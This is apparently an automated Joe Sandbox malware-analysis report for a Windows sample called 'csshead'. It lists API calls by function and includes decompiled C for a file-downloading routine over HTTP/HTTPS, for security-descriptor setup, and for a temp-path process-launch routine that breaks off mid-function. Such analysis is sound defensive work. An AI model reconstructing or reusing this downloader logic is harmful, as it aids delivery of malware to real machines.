    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042826C, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327LIBRARYCODE
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041F4A0, Relevance: 10.7, APIs: 7, Instructions: 158window
    APIs
    • FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
    • LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
    • LockResource.KERNEL32(00000000), ref: 0041F4D9
    • LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041E6B0: DeleteObject.GDI32(00000000,00000000), ref: 0041E6C3
    • LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
    • DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 00410BB0: GetVersionExA.KERNEL32 ref: 00410BD6
    • DeleteObject.GDI32(00000000), ref: 0041F652
      • Part of subcall function 0041EE80: GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
      • Part of subcall function 0041EE80: SelectObject.GDI32(00000000,?), ref: 0041EEDA
      • Part of subcall function 0041EE80: DeleteDC.GDI32(00000000), ref: 0041EF7C
      • Part of subcall function 0041EE80: GetCurrentProcess.KERNEL32 ref: 0041F006
      • Part of subcall function 0041EE80: FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041EE80: SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A
      • Part of subcall function 00411B80: DeleteObject.GDI32 ref: 00411B8A
      • Part of subcall function 0041E1F0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041E200
      • Part of subcall function 0041E1F0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041E208
      • Part of subcall function 0041E1F0: LockResource.KERNEL32(00000000), ref: 0041E20F
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411A50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 112
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00411AD3
    • GetWindowLongA.USER32(?,000000FC), ref: 00411AE8
    • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00411AFD
    • GetWindowLongA.USER32(?,000000FC), ref: 00411B18
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00411B2A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00420390, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 112
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00420413
    • GetWindowLongA.USER32(?,000000FC), ref: 00420428
    • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 0042043D
    • GetWindowLongA.USER32(?,000000FC), ref: 00420458
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0042046A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00418A10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
    APIs
    • DefFrameProcA.USER32(?,?,?,?,?), ref: 00418A9A
    • GetWindowLongA.USER32(?,000000FC), ref: 00418AAF
    • DefFrameProcA.USER32(?,?,00000082,?,?), ref: 00418AC4
    • GetWindowLongA.USER32(?,000000FC), ref: 00418ADF
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00418AF1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00419220, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100windowstring
    APIs
    • GetMenuItemCount.USER32(?), ref: 0041922F
    • GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
    • GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
    • lstrcmp.KERNEL32(?,&Window), ref: 004192E4
    • GetSubMenu.USER32(?,?), ref: 00419317
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00418ED0, Relevance: 10.6, APIs: 7, Instructions: 87window
    APIs
    • GetMenuItemCount.USER32 ref: 00418EEB
    • RemoveMenu.USER32(?,-00000001,00000400), ref: 00418F07
    • DestroyMenu.USER32 ref: 00418F15
    • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 00418F46
    • PeekMessageA.USER32 ref: 00418F88
    • PtInRect.USER32(00000000,00000000,?), ref: 00418F9D
    • PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 00418FBC
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004202C0, Relevance: 10.6, APIs: 7, Instructions: 80window
    APIs
    • SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004202D1
    • GetWindowLongA.USER32(?,000000EC), ref: 004202F4
    • GetWindowLongA.USER32(?,000000EC), ref: 00420302
    • GetWindowLongA.USER32(?,000000F0), ref: 00420311
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0042034C
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 00420365
    • GetClientRect.USER32(?,?), ref: 00420378
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00418760, Relevance: 10.6, APIs: 7, Instructions: 75window
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 0041877C
    • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
    • GetWindowRect.USER32(?,?), ref: 004187C9
    • GetWindowLongA.USER32(?,000000F0), ref: 004187E4
    • SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
    • GetWindowRect.USER32(?,?), ref: 00418823
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00412950, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66window
    APIs
    • GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
    • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00416430, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61string
    APIs
    • GetClassNameA.USER32(?,00000007,00000007), ref: 0041645A
    • lstrcmp.KERNEL32(#32768,00000000), ref: 0041646A
    • GetClassNameA.USER32(?,00000007,00000007), ref: 0041649A
    • lstrcmp.KERNEL32(#32768,00000000), ref: 004164AA
    • CallNextHookEx.USER32(00442A54,?,?,?), ref: 004164D8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00421F2E, Relevance: 10.6, APIs: 7, Instructions: 58
    APIs
    • GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
    • RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
    • RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
    • RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
    • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
      • Part of subcall function 00421E10: IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
      • Part of subcall function 00421E10: GetProcessHeap.KERNEL32(00000018,00000008,?,?,?,?,?,004124FE), ref: 00421E41
      • Part of subcall function 00421E10: RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
      • Part of subcall function 00421E10: InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
      • Part of subcall function 00421E10: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,004124FE), ref: 00421E67
      • Part of subcall function 00421E10: HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00429A60, Relevance: 9.3, APIs: 6, Instructions: 262LIBRARYCODE
    APIs
    • _ValidateScopeTableHandlers.LIBCMT ref: 00429B61
    • __FindPESection.LIBCMT ref: 00429B7B
    • VirtualQuery.KERNEL32(?,004420A4,0000001C,004420A4,?,?,?,?,?,00429F50,0043CE68,000000FE,?,00423B11,?), ref: 00429C61
    • __FindPESection.LIBCMT ref: 00429CB0
    • _ValidateScopeTableHandlers.LIBCMT ref: 00429CD4
      • Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 004299E3
      • Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 00429A21
    • __FindPESection.LIBCMT ref: 00429CEE
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042C6E0, Relevance: 9.2, APIs: 6, Instructions: 190LIBRARYCODE
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000200,?,?,?,?,?,?), ref: 0042C751
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042C7BF
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042C7DB
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C814
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C87A
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0042C899
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041EE80, Relevance: 9.2, APIs: 6, Instructions: 162
    APIs
    • GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
    • SelectObject.GDI32(00000000,?), ref: 0041EEDA
    • DeleteDC.GDI32(00000000), ref: 0041EF7C
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • GetCurrentProcess.KERNEL32 ref: 0041F006
    • FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041E470: SelectObject.GDI32(?,00000000), ref: 0041E504
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00432A40, Relevance: 9.1, APIs: 6, Instructions: 117string
    APIs
    • lstrlen.KERNEL32(?,004420A4), ref: 00432A87
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432A9D
    • GetLastError.KERNEL32 ref: 00432AAC
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432B3B
    • GetLastError.KERNEL32 ref: 00432B56
    • SysAllocString.OLEAUT32(00000000), ref: 00432B71
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00415510, Relevance: 9.1, APIs: 6, Instructions: 86
    APIs
    • GetSysColorBrush.USER32(0000001D), ref: 0041557A
    • FillRect.USER32(?,?,00000000), ref: 00415586
    • GetSysColorBrush.USER32(0000000D), ref: 0041558E
    • FrameRect.USER32(?,?,00000000), ref: 0041559A
    • GetSysColor.USER32(00000011), ref: 004155C4
      • Part of subcall function 00413E50: SetTextColor.GDI32(?,?), ref: 00413E6B
      • Part of subcall function 00413E50: SetBkMode.GDI32(?,?), ref: 00413E76
      • Part of subcall function 00413E50: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
      • Part of subcall function 00413E50: SelectObject.GDI32(?,00000000), ref: 00413E9C
      • Part of subcall function 00413E50: SendMessageA.USER32 ref: 00413F0F
      • Part of subcall function 00413E50: DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
      • Part of subcall function 00413E50: SelectObject.GDI32(?,?), ref: 00413F47
    • GetSysColor.USER32(00000011), ref: 004155F3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00404408, Relevance: 9.1, APIs: 6, Instructions: 85
    C-Code - Quality: 64%
    			E00404408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x40a0d4; // 0x401cb4
					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L5:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L5;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}














    0x0040440e
    0x00404411
    0x00404416
    0x00404427
    0x0040444d
    0x00404453
    0x0040445b
    0x00404461
    0x004044bb
    0x00404463
    0x00404465
    0x00404478
    0x00404480
    0x00404486
    0x004044a8
    0x004044ac
    0x004044b2
    0x00404488
    0x00404498
    0x004044a0
    0x004044a6
    0x00000000
    0x00000000
    0x004044a6
    0x00404486
    0x004044c6
    0x004044cb
    0x004044d7
    0x004044df
    0x004044df
    0x004044e5
    0x004044e5
    0x004044ee

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
    • LocalFree.KERNEL32(?), ref: 004044AC
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004207F0, Relevance: 9.1, APIs: 6, Instructions: 82
    APIs
    • GetClientRect.USER32 ref: 00420817
    • GetWindowLongA.USER32(?,000000F0), ref: 00420833
    • GetWindowRect.USER32 ref: 0042085B
    • GetWindowLongA.USER32(?,000000F0), ref: 00420873
    • GetWindowRect.USER32(?,?), ref: 0042089B
    • SetWindowPos.USER32(00000000,00000000,00000000,?,00000000,?,00000014), ref: 004208CD
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00410EB0, Relevance: 9.1, APIs: 6, Instructions: 65windowthread
    APIs
    • GetActiveWindow.USER32 ref: 00410EDF
    • GetWindowThreadProcessId.USER32(00000000), ref: 00410EE6
    • GetCurrentProcessId.KERNEL32 ref: 00410EEC
    • IsWindowEnabled.USER32(?), ref: 00410EFD
    • SendMessageA.USER32(?,0000011F,00000000,?), ref: 00410F40
    • SendMessageA.USER32(?,0000011F,FFFF0000,00000000), ref: 00410F58
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00421E10, Relevance: 9.0, APIs: 6, Instructions: 47
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
    • GetProcessHeap.KERNEL32(00000018,00000008,?,?,?,?,?,004124FE), ref: 00421E41
    • RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,004124FE), ref: 00421E67
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00403C28, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 184file
    C-Code - Quality: 98%
    			E00403C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
				intOrPtr _v8;
				CHAR* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				signed int _v72;
				char _v201;
				char _v458;
				void _v1483;
				signed int _t88;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t175;
				void* _t180;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				_t176 =  *0x40b7a4;
				if( *0x40b7a4 == 0) {
					E00403A04(_t176);
				}
				_t162 =  *0x40a1a4; // 0x401ec0
				_t88 = E00401110(_v8, _t162);
				asm("sbb eax, eax");
				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
				_v56 = E00401110(_v8, E00403E98);
				if(_v56 != 0) {
					_v56 = _v56 + 2;
					_v60 = E00401110(_v56, 0x403e9c);
					_v32 = _v60 - _v56;
					E004012B8( &_v201, _v32, _v56);
					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
					E00401308( &_v458, _v60);
				}
				_t93 =  *0x40a298; // 0x0
				_t94 = _t93 - 1;
				_t180 = _t94;
				if(_t180 < 0) {
					_v64 = 0;
				} else {
					if(_t180 == 0) {
						_v64 = 0;
					} else {
						if(_t94 == 1) {
							_v64 = 1;
						}
					}
				}
				_v20 = E00403864(0x40b7a4, _v64, 0, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x50;
				} else {
					_v72 = 0x1bb;
				}
				_v24 = E0040161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x4400000;
				} else {
					_v72 = 0x4c03000;
				}
				_t165 =  *0x40a244; // 0x4020b8
				_v28 = E00401660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
				if(_v68 != 0) {
					_v32 = 4;
					E004016D8(_v28,  &_v72, 0x1f,  &_v32);
					_v72 = _v72 | 0x00000100;
					E0040170C(_v28,  &_v72, 0x1f, 4);
				}
				E004015E4(_v28, 0, 0, 0, 0);
				_v32 = 4;
				_v36 = 0;
				_v40 = 0;
				E004039CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
				if(_v36 != 0xc8) {
					L24:
					E0040151C(_v28);
					E0040151C(_v24);
					E0040151C(_v20);
					return _v16;
				} else {
					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_v52 == 0xffffffff) {
						goto L24;
					} else {
						goto L21;
					}
					do {
						L21:
						_v44 = E004016A4(_v28, 0,  &_v32, 0);
						E004015B0(_v28, 0x401,  &_v1483,  &_v32);
						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
					} while (_v32 != 0 || _v44 == 0);
					CloseHandle(_v52);
					_v16 = 0xffffffff;
					goto L24;
				}
			}






























    0x00403c31
    0x00403c34
    0x00403c39
    0x00403c3c
    0x00403c43
    0x00403c45
    0x00403c45
    0x00403c4a
    0x00403c53
    0x00403c60
    0x00403c62
    0x00403c72
    0x00403c79
    0x00403c81
    0x00403c91
    0x00403c9a
    0x00403ca9
    0x00403cb1
    0x00403cc2
    0x00403cc2
    0x00403cc7
    0x00403ccc
    0x00403ccc
    0x00403ccf
    0x00403cda
    0x00403cd1
    0x00403cd1
    0x00403ce1
    0x00403cd3
    0x00403cd4
    0x00403ce6
    0x00403ce6
    0x00403cd4
    0x00403cd1
    0x00403d01
    0x00403d08
    0x00403d13
    0x00403d0a
    0x00403d0a
    0x00403d0a
    0x00403d36
    0x00403d3d
    0x00403d48
    0x00403d3f
    0x00403d3f
    0x00403d3f
    0x00403d61
    0x00403d6f
    0x00403d76
    0x00403d78
    0x00403d8e
    0x00403d93
    0x00403da7
    0x00403da7
    0x00403db7
    0x00403dbc
    0x00403dc5
    0x00403dca
    0x00403de0
    0x00403dec
    0x00403e78
    0x00403e7b
    0x00403e83
    0x00403e8b
    0x00403e96
    0x00403df2
    0x00403e0e
    0x00403e15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00403e17
    0x00403e17
    0x00403e26
    0x00403e3b
    0x00403e55
    0x00403e5b
    0x00403e6b
    0x00403e71
    0x00000000
    0x00403e71

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
    • CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0041F040, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0041F076
    • FlushInstructionCache.KERNEL32(00000000,?,?,00000000), ref: 0041F07D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 0041F113
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E,?,00421617,?,?,?,?,?,?,?,?,00000000), ref: 0041F097
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004082F4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82processsleep
    C-Code - Quality: 100%
    			E004082F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t78;

				_t36 = __eax -  *__eax;
				 *_t36 =  *_t36 + _t36;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = _t36;
				_v20 = 0;
				_v24 = E00407CFC(_v12);
				E00401258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t42 =  *0x40a168; // 0x401dec
					E00407290(_t42);
				} else {
					_v28 = E00401110(_v8, 0x408494);
					_t102 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E00407560( &_v1054, 0x408494, _t102);
						E00401308( &_v541, 0x40849c);
						E0040133C( &_v541,  &_v1054);
						E0040133C( &_v541, 0x40849c);
						_t58 =  *0x40a0a8; // 0x401c4c
						E0040133C( &_v541, _t58);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x40b514 = 0;
							_t63 =  *0x40b510; // 0x0
							E00401828(_t63);
